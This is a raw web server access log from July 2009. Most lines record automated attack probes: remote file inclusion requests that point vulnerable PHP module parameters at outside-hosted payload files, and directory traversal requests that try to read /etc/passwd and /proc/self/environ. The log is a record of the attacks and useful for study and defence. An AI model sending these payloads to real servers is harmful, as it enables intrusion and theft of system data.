65.254.32.2 - - [10/Jul/2009:02:55:43 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:02:55:50 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:02:56:05 -0400] "GET /logs/access_log.Q109052400%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:02:56:55 -0400] "GET /logs/access_log.Q109051200%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:02:57:48 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:02:57:54 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
61.170.201.44 - - [10/Jul/2009:02:58:24 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MyIE2)"
61.170.201.44 - - [10/Jul/2009:02:58:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MyIE2)"
61.170.201.44 - - [10/Jul/2009:02:58:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MyIE2)"
61.170.201.44 - - [10/Jul/2009:02:58:33 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MyIE2)"
66.178.116.28 - - [10/Jul/2009:02:58:53 -0400] "GET /logs/access_log.Q109051700%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.178.116.28 - - [10/Jul/2009:02:58:53 -0400] "GET /logs/access_log.Q109051400%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:02:59:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.189 - - [10/Jul/2009:03:00:49 -0400] "GET /logs/error_log.Q109060500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.38.210.157 - - [10/Jul/2009:03:01:49 -0400] "GET /logs/access_log.Q109060900/index.php?redir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
65.38.210.157 - - [10/Jul/2009:03:01:50 -0400] "GET /logs/index.php?redir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
65.38.210.157 - - [10/Jul/2009:03:01:50 -0400] "GET /index.php?redir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
200.234.200.154 - - [10/Jul/2009:03:01:51 -0400] "GET //include.php?path[docroot]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
200.234.200.154 - - [10/Jul/2009:03:01:51 -0400] "GET /logs//include.php?path[docroot]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
200.234.200.154 - - [10/Jul/2009:03:01:51 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 237 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
200.234.200.154 - - [10/Jul/2009:03:01:52 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.234.200.154 - - [10/Jul/2009:03:01:52 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.234.200.154 - - [10/Jul/2009:03:01:52 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.234.200.154 - - [10/Jul/2009:03:01:52 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 237 "-" "XXXXXX"
200.234.200.154 - - [10/Jul/2009:03:01:52 -0400] "GET //include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 210 "-" "XXXXXX"
200.234.200.154 - - [10/Jul/2009:03:01:52 -0400] "GET /logs//include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 215 "-" "XXXXXX"
200.234.200.154 - - [10/Jul/2009:03:01:53 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 237 "-" "XXXXXX"
200.234.200.154 - - [10/Jul/2009:03:01:53 -0400] "GET //include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 210 "-" "XXXXXX"
200.234.200.154 - - [10/Jul/2009:03:01:53 -0400] "GET /logs//include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 215 "-" "XXXXXX"
65.38.210.157 - - [10/Jul/2009:03:01:54 -0400] "GET /logs/access_log.Q109061900/index.php?redir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
89.223.3.98 - - [10/Jul/2009:03:02:00 -0400] "GET /logs/access_log.Q109062700%20%20/senetman/html/index.php?page=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jul/2009:03:02:00 -0400] "GET /logs/access_log.Q109051100%20%20/senetman/html/index.php?page=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jul/2009:03:02:00 -0400] "GET /logs/senetman/html/index.php?page=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jul/2009:03:02:00 -0400] "GET /senetman/html/index.php?page=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jul/2009:03:02:01 -0400] "GET /senetman/html/index.php?page=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jul/2009:03:02:01 -0400] "GET /logs/senetman/html/index.php?page=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jul/2009:03:02:01 -0400] "GET /logs/access_log.Q109051100%20%20/senetman/html/index.php?page=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jul/2009:03:02:01 -0400] "GET /logs/access_log.Q109062700%20%20/senetman/html/index.php?page=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.234.200.154 - - [10/Jul/2009:03:02:25 -0400] "GET /logs/access_log.Q109053100//include.php?path[docroot]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 237 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
200.234.200.154 - - [10/Jul/2009:03:02:25 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.234.200.154 - - [10/Jul/2009:03:02:26 -0400] "GET /logs/access_log.Q109053100//include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 237 "-" "XXXXXX"
200.234.200.154 - - [10/Jul/2009:03:02:26 -0400] "GET /logs/access_log.Q109053100//include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 237 "-" "XXXXXX"
114.32.40.221 - - [10/Jul/2009:03:02:56 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:03:30 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:03:30 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:03:30 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jul/2009:03:03:38 -0400] "GET /logs/access_log.Q109051100/senetman/html/index.php?page=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jul/2009:03:03:38 -0400] "GET /logs/access_log.Q109062700/senetman/html/index.php?page=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jul/2009:03:03:39 -0400] "GET /logs/access_log.Q109051100/senetman/html/index.php?page=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jul/2009:03:03:39 -0400] "GET /logs/access_log.Q109062700/senetman/html/index.php?page=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:03:46 -0400] "GET /logs/access_log.Q109052300//modules/agendax/addevent.inc.php?agendax_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.206.120.187 - - [10/Jul/2009:03:04:11 -0400] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.206.120.187 - - [10/Jul/2009:03:04:11 -0400] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.206.120.187 - - [10/Jul/2009:03:04:11 -0400] "GET /logs/access_log.Q109060500/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:03:04:14 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:03:04:14 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:03:04:14 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:03:04:21 -0400] "GET /logs/access_log.Q109052300//modules/agendax/addevent.inc.php?agendax_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:03:04:35 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:03:04:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.125.45.45 - - [10/Jul/2009:03:06:12 -0400] "GET /index.php?redir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.125.45.45 - - [10/Jul/2009:03:06:12 -0400] "GET /logs/index.php?redir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
202.125.45.45 - - [10/Jul/2009:03:06:12 -0400] "GET /logs/error_log.Q109070200/index.php?redir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
65.254.32.2 - - [10/Jul/2009:03:07:07 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:07:07 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:03:07:54 -0400] "GET /logs/access_log.Q109051200//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.206.120.187 - - [10/Jul/2009:03:08:13 -0400] "GET /logs/access_log.Q109060600%20%20/port.php?content=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.206.120.187 - - [10/Jul/2009:03:08:13 -0400] "GET /logs/port.php?content=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.206.120.187 - - [10/Jul/2009:03:08:13 -0400] "GET /port.php?content=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
66.249.68.247 - - [10/Jul/2009:03:09:01 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L1091FF3226C880008719086+WSEQ(S0060):1+OUITEM(A0200):5099001 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [10/Jul/2009:03:09:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.117.172.131 - - [10/Jul/2009:03:09:52 -0400] "GET /logs/access_log.Q109051200%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.206.120.187 - - [10/Jul/2009:03:10:01 -0400] "GET /logs/access_log.Q109060600/port.php?content=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:03:10:05 -0400] "GET /logs/access_log.Q109051200//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:10:07 -0400] "GET /logs/access_log.Q109051200%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.206.120.187 - - [10/Jul/2009:03:10:14 -0400] "GET /logs/access_log.Q109051200/port.php?content=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:03:10:53 -0400] "GET /logs/access_log.Q109052400//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
201.232.54.48 - - [10/Jul/2009:03:10:58 -0400] "GET /logs/access_log.Q109061800%20//modules/agendax/addevent.inc.php?agendax_path=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
59.22.140.17 - - [10/Jul/2009:03:11:17 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:03:11:17 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:03:11:17 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:03:11:56 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.249.68.70 - - [10/Jul/2009:03:12:00 -0400] "GET /images/items/682475A_thumb.jpg HTTP/1.1" 200 1160 "-" "Googlebot-Image/1.0"
121.124.127.34 - - [10/Jul/2009:03:12:08 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:03:12:08 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:03:12:08 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.169.210.130 - - [10/Jul/2009:03:12:53 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
217.169.210.130 - - [10/Jul/2009:03:12:53 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
217.169.210.130 - - [10/Jul/2009:03:12:54 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
217.169.210.130 - - [10/Jul/2009:03:12:54 -0400] "GET /logs/access_log.Q109062700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
211.236.242.164 - - [10/Jul/2009:03:13:35 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:03:14:04 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:03:14:47 -0400] "GET /logs/access_log.Q109052400%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:03:14:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.206.120.187 - - [10/Jul/2009:03:15:23 -0400] "GET /logs/access_log.Q109051700/main.php?x=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.206.120.187 - - [10/Jul/2009:03:15:23 -0400] "GET /logs/main.php?x=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.206.120.187 - - [10/Jul/2009:03:15:23 -0400] "GET /main.php?x=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:16:24 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:16:24 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:16:24 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
92.50.143.90 - - [10/Jul/2009:03:16:44 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 200 454 "-" "libwww-perl/5.803"
92.50.143.90 - - [10/Jul/2009:03:16:44 -0400] "GET /logs/access_log.Q109061500////?_SERVER[DOCUMENT_ROOT]=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
92.50.143.90 - - [10/Jul/2009:03:16:44 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 200 8929 "-" "libwww-perl/5.803"
211.236.242.164 - - [10/Jul/2009:03:17:01 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:03:17:02 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:03:17:02 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
79.148.238.69 - - [10/Jul/2009:03:17:25 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
79.148.238.69 - - [10/Jul/2009:03:17:26 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
79.148.238.69 - - [10/Jul/2009:03:17:26 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
79.148.238.69 - - [10/Jul/2009:03:17:27 -0400] "GET /logs/access_log.Q109062700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
216.117.172.131 - - [10/Jul/2009:03:18:02 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.6.22.189 - - [10/Jul/2009:03:18:22 -0400] "GET /images/_notes/nav_store_search_over.jpg.mno HTTP/1.0" 200 211 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
59.22.140.17 - - [10/Jul/2009:03:18:42 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:03:19:29 -0400] "GET /logs/access_log.Q109062500%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:03:19:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.117.172.131 - - [10/Jul/2009:03:20:01 -0400] "GET /logs/access_log.Q109051200//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:20:48 -0400] "GET /logs/access_log.Q109070100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.126.128.202 - - [10/Jul/2009:03:22:02 -0400] "GET /logs/access_log.Q109052500%20%20/index.php?pagina=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
75.126.128.202 - - [10/Jul/2009:03:22:02 -0400] "GET /index.php?pagina=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
75.126.128.202 - - [10/Jul/2009:03:22:02 -0400] "GET /logs/index.php?pagina=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
75.126.128.202 - - [10/Jul/2009:03:22:17 -0400] "GET /logs/access_log.Q109060700%20%20/index.php?pagina=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:03:22:42 -0400] "GET /logs/access_log.Q109052400//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:23:05 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
76.12.17.218 - - [10/Jul/2009:03:23:59 -0400] "GET //oneadmin/config.php?path[docroot]=http://www.perfumechaletusa.com/images/baner.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
76.12.17.218 - - [10/Jul/2009:03:23:59 -0400] "GET /logs/error_log.Q109061500//oneadmin/config.php?path[docroot]=http://www.perfumechaletusa.com/images/baner.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
